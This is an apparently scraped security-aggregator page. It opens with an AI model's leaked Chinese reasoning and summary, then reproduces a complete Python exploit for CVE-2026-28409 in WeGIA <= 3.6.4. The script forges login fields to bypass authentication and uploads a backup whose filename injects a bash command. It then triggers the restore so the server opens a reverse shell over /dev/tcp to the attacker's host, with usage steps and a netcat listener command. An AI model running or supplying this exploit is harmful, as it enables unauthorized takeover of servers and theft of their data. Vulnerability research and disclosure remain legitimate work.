嗯,用户发来了一段内容,看起来是关于一个安全漏洞的Python脚本和相关的信息。他让我用中文帮他总结一下这篇文章的内容,控制在100个字以内,而且不需要特定的开头。 首先,我需要理解用户的需求。他可能是在研究这个漏洞,或者想快速了解这个脚本的功能。用户可能是一位安全研究人员、渗透测试人员,或者是对网络安全感兴趣的学生。 接下来,我看看文章内容。文章标题提到WeGIA <= 3.6.4存在远程代码执行漏洞,通过操作系统命令注入。作者是Mohammed Idrees Banyamer,来自约旦。漏洞的CVE编号是CVE-2026-28409,影响版本到3.6.4,并在3.6.5中修复。 脚本的主要功能是利用备份恢复功能中的命令注入漏洞,结合身份验证绕过,从而实现远程代码执行。使用方法包括启动一个反向shell监听器和运行exploit脚本。 总结时需要涵盖关键点:漏洞名称、影响范围、攻击方式、利用条件以及修复版本。同时要控制在100字以内。 所以,我应该简洁地表达这些信息,确保用户能快速抓住重点。 </think> WeGIA <= 3.6.4 存在远程代码执行漏洞(CVE-2026-28409),通过备份恢复功能中的操作系统命令注入实现。攻击者可利用身份验证绕过结合命令注入,在目标服务器上执行任意代码并获取反向shell。该漏洞已修复于版本3.6.5。 2026-3-3 20:45:2 Author: cxsecurity.com(查看原文) 阅读量:5 收藏
WeGIA <= 3.6.4 Remote Code Execution via OS Command Injection
#!/usr/bin/env python3 # Exploit Title: WeGIA <= 3.6.4 Remote Code Execution via OS Command Injection in Backup Restore # CVE: CVE-2026-28409 # Date: 2026-02-28 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: # Vendor Homepage: https://github.com/LabRedesCefetRJ/WeGIA # Software Link: https://github.com/LabRedesCefetRJ/WeGIA # Affected: WeGIA <= 3.6.4 # Tested on: # Category: Webapps # Platform: PHP # Exploit Type: Remote # CVSS: 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) # CWE: CWE-78 # Description: OS Command Injection in backup/restore functionality allowing unauthenticated RCE when combined with authentication bypass # Fixed in: 3.6.5 # Usage: python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port> # # Examples: # python3 exploit.py http://192.168.1.100/WeGIA --lhost 192.168.1.50 --lport 4444 # # Options: # --lhost Attacker IP for reverse shell # --lport Attacker listening port # # Notes: # - Requires netcat listener: nc -lvnp <port> # - Uses authentication bypass + command injection in filename during restore # - Payload is reverse shell via bash # # How to Use # # Step 1: Start listener # nc -lvnp 4444 # # Step 2: Run exploit # python3 exploit.py http://target/WeGIA --lhost 10.10.14.5 --lport 4444 import requests import urllib3 import urllib.parse import argparse import sys import time urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) BANNER = r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-28409 • WeGIA Backup Restore Command Injection ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """ print(BANNER) def parse_args(): parser = argparse.ArgumentParser(description="WeGIA CVE-2026-28409 RCE Exploit") parser.add_argument("target", help="Target URL (e.g. http://192.168.1.100/WeGIA)") parser.add_argument("--lhost", required=True, help="Attacker IP for reverse shell") parser.add_argument("--lport", required=True, help="Attacker listening port") return parser.parse_args() def build_payload(lhost, lport): revshell = f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'" filename = f"dump;{revshell};poc.tar.gz" return filename def main(): args = parse_args() base_url = args.target.rstrip('/') lhost = args.lhost lport = args.lport session = requests.Session() session.verify = False malicious_filename = build_payload(lhost, lport) print(f"[*] Generated malicious filename: {malicious_filename}") dummy_content = ( b"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03" b"\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00" ) print("[*] Attempting authentication bypass + admin session") login_url = f"{base_url}/html/login.php" bypass_data = { 'c': 'true', 'cpf': 'admin', 'id_pessoa': '1' } try: r = session.post(login_url, data=bypass_data, timeout=10) if r.status_code != 200: print(f"[-] Login bypass failed (status {r.status_code})") sys.exit(1) print("[+] Auth bypass appears successful") except Exception as e: print(f"[-] Connection error during login: {e}") sys.exit(1) print("[*] Uploading dummy backup with malicious filename") upload_url = f"{base_url}/html/configuracao/importar_dump.php" files = { 'import': (malicious_filename, dummy_content, 'application/gzip') } upload_data = { 'usuario': '1', 'id_pessoa': '1' } try: r = session.post(upload_url, files=files, data=upload_data, timeout=12) if r.status_code not in (200, 201, 302): print(f"[-] Upload failed (status {r.status_code})") sys.exit(1) print("[+] Upload completed") except Exception as e: print(f"[-] Upload error: {e}") sys.exit(1) print("[*] Triggering restore → attempting RCE") restore_url = f"{base_url}/html/configuracao/gerenciar_backup.php" params = { 'action': 'restore', 'file': malicious_filename, 'usuario': '1', 'id_pessoa': '1' } try: r = session.get(restore_url, params=params, allow_redirects=False, timeout=15) print("[*] Restore request sent") print("[*] Check your listener for incoming reverse shell") print(f"[*] If no connection after 10-20s → target may be patched / firewall blocked / wrong path") except Exception as e: print(f"[-] Error during restore trigger: {e}") print("\nExploit finished. Waiting for shell...\n") if __name__ == "__main__": main()
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh